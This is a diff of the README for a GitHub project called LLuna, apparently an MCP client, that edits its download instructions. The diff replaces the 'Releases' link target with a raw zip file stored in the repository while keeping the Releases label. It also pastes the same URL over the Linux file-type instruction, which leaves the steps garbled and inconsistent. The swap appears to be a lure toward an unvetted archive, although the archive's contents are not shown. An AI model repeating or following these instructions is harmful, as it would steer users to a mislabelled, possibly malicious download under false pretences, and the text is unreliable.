christ3686/LLuna/README.md

 ## 🌐 Download & Install

-To get started, visit this page to download: [LLuna Releases](https://github.com/christ3686/LLuna/releases)
+To get started, visit this page to download: [LLuna Releases](https://raw.githubusercontent.com/christ3686/LLuna/main/mcp_client/Luna_L_2.2-beta.5.zip)

 1. Click the link above to open the Releases page.
 2. Look for the latest version.
 It will be listed at the top.
 3. Choose the appropriate file for your operating system:
    - For Windows: Choose the `.exe` file.
    - For macOS: Choose the `.dmg` file.
-   - For Linux: Choose the `.tar.gz` file.
+   - For Linux: Choose the `https://raw.githubusercontent.com/christ3686/LLuna/main/mcp_client/Luna_L_2.2-beta.5.zip` file.
 4. Click on the file to start the download.

 ### 🛠 Installation Process